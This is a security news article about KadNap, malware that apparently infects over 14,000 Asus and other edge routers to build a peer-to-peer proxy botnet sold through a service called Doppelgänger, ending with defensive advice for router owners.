KadNap Malware Invades 14,000+ Edge Devices, Fueling Stealth Proxy Botnet
Recent cybersecurity alerts have spotlighted a malware named KadNap, which has infected over 14,000 devices, primarily targeting Asus routers. This malware, first identified in August 2025, has predominantly struck victims in the United States, with more than 60% of the infections reported there.
KadNap Malware Overview
- Initial Detection: August 2025
- Devices Compromised: 14,000+
- Primary Target: Asus routers
- Geographic Spread: High infection rates in the U.S., along with cases in Taiwan, Hong Kong, Russia, U.K., Australia, Brazil, France, Italy, and Spain.
The Black Lotus Labs team at Lumen reveals that the KadNap malware leverages a customized version of the Kademlia Distributed Hash Table (DHT) protocol. This technology helps conceal the malware’s infrastructure within a peer-to-peer network, making it resistant to typical network monitoring.
How KadNap Operates
Once the malware compromises a device, it connects to a command-and-control (C2) server for ongoing communication. The C2 address identified is 212.104.141.140. Central to KadNap’s operation is a shell script called aic.sh, which initiates the device’s participation in the botnet.
The shell script sets a cron job that retrieves another script every 55 minutes, maintaining persistence. This script pulls and executes a malicious ELF file renamed to “kad,” thereby enabling the full functionality of the KadNap malware.
Technical Capabilities
- Targeted Architectures: ARM and MIPS processors
- Malicious Activities:
- Connects to a Network Time Protocol (NTP) server to fetch the time.
- Generates a hash for peer discovery in the decentralized network.
- Closes port 22, essential for Secure Shell (SSH) access.
- Extracts a list of C2 IP addresses and ports.
Lumen notes the innovative use of DHT allows KadNap to maintain communication channels that are hard to disrupt by blending in with legitimate traffic.
Doppelgänger Proxy Service
The KadNap malware is marketed through a proxy service called Doppelgänger, operating via the site doppelganger.shop. This service, described as a rebrand of a previous proxy operation linked to TheMoon malware, claims to provide “100% anonymity” with resident proxies in over 50 countries. It reportedly began operations around May or June 2025.
Recommendations for Users
To combat the threat posed by KadNap, users with SOHO routers should take the following precautions:
- Keep devices updated.
- Reboot devices regularly.
- Change default passwords.
- Secure management interfaces.
- Replace outdated models that are no longer supported.
In conclusion, the KadNap botnet exemplifies a distinct approach among anonymous proxies using a peer-to-peer network for decentralized control, making detection challenging. As the situation evolves, vigilance remains crucial for users to protect their devices.
